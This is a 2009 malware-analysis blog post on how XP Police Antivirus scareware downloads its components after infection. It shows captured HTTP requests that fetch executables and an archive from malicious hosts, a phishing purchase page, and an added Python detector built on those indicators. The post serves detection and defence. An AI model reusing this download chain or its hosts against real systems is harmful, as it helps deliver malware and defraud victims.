Wednesday, March 11, 2009

Aggressive strategy of XP Police Antivirus infection. Second part

From the moment XP Police Antivirus infects the system, it begins to display on screen a series of false alerts about supposed infections, among other things.

But entirely in the background, it carries out a series of actions to complete the scareware's work. By capturing the traffic, we see the download of the following components:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Despite its extension, the downloaded setup.dat is not a data file but a compressed archive holding copies of the other files, which are unpacked into C:\Program Files\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

The downloaded sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) is a runtime packer used to compress the malware in an attempt to evade detection by antivirus programs.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

The response body begins with the MZ header and DOS stub, so svchost32.exe is a Windows executable served as a generic octet-stream; note also that the downloader identifies itself with the non-browser User-Agent MS_Update32.


GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

This request uses a different User-Agent (wget 3.0) and receives a one-byte response, the character 2.


GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

The JavaScript file window.js displays a pop-up window on screen with the caption Thank you for Installation! Unlike the earlier downloads, this request is made through the browser itself, with an id parameter and cookie that track the installation.


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page for purchasing the scareware, where the victim's sensitive and financial information is requested. It is a scam/phishing page.

The maneuvers used by malicious code are becoming more aggressive and effective because, as we have seen, the installer downloaded in the first instance is only one piece of the puzzle, from which the scareware fetches the remaining pieces.
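As an added example (not part of the original post and not code from the malware or its author), the following Python script turns the indicators visible in the captured traffic above into a simple detector. It parses a plain-text request log, flags the non-browser User-Agent strings MS_Update32 and wget 3.0, the hosts seen in the capture, and fetches of .exe/.dat payloads, and it classifies a downloaded body by its magic bytes rather than its extension, which is how the compressed .dat archive and the MZ-headed svchost32.exe would be told apart. The transcript embedded in the script is constructed from the requests in the post plus one benign request; the indicator lists are assumptions chosen for illustration, not a published signature.

```python
"""Flag the scareware download pattern from the post in a plain-text HTTP request log."""
import re

# Indicators drawn from the captured traffic in the post (assumed set, for illustration).
SUSPICIOUS_USER_AGENTS = {"MS_Update32", "wget 3.0"}
SUSPICIOUS_HOSTS = {"setupdatdownload.com", "xp-police-09.com", "www.xp-police-09.com"}
# Extensions the downloader fetched; a .dat served as octet-stream deserves a look.
PAYLOAD_EXTENSIONS = (".exe", ".dat")

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")

# Constructed sample transcript: the requests from the post plus one benign request.
SAMPLE_TRANSCRIPT = """GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

GET /js/window.js HTTP/1.1
Referer: http://www.xp-police-09.com/installed.php?id=108
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Cookie: id=108

GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
"""


def parse_requests(transcript: str) -> list[dict]:
    """Split a blank-line-separated capture into requests (request line + headers)."""
    requests = []
    for chunk in re.split(r"\n\s*\n", transcript.strip()):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        match = REQUEST_LINE.match(lines[0]) if lines else None
        if not match:
            continue  # not a request line; skip response blocks or junk
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append({"method": match["method"], "path": match["path"], "headers": headers})
    return requests


def score_request(req: dict) -> list[str]:
    """Return the reasons a request looks like the downloader traffic, empty if none."""
    reasons = []
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    if ua in SUSPICIOUS_USER_AGENTS:
        reasons.append(f"non-browser User-Agent '{ua}'")
    elif not ua.startswith("Mozilla/"):
        reasons.append(f"unusual User-Agent '{ua}'")
    if host in SUSPICIOUS_HOSTS:
        reasons.append(f"known scareware host {host}")
    if req["path"].lower().endswith(PAYLOAD_EXTENSIONS):
        reasons.append(f"payload fetch {req['path']}")
    return reasons


def find_suspicious(transcript: str) -> list[tuple[str, list[str]]]:
    """Return (path, reasons) for every request in the transcript that was flagged."""
    flagged = []
    for req in parse_requests(transcript):
        reasons = score_request(req)
        if reasons:
            flagged.append((req["path"], reasons))
    return flagged


def classify_payload(body: bytes) -> str:
    """Identify a downloaded blob by magic bytes, ignoring whatever extension it was served under."""
    if body[:2] == b"MZ":
        return "pe"  # Windows executable (svchost32.exe in the capture)
    if body[:4] == b"PK\x03\x04":
        return "zip"  # the kind of archive a .dat may really be
    if body[:4] == b"MSCF":
        return "cab"
    if body[:3] == b"\x1f\x8b\x08":
        return "gzip"
    return "unknown"


if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_TRANSCRIPT):
        print(path, "->", "; ".join(reasons))
    print(classify_payload(b"MZ\x90\x00\x03\x00\x00\x00"))
```

Running it flags the four requests from the post and leaves the benign request alone; in practice the User-Agent and magic-byte checks generalize, while the host list is the part that goes stale first.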

Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering


# Jorge Mieres
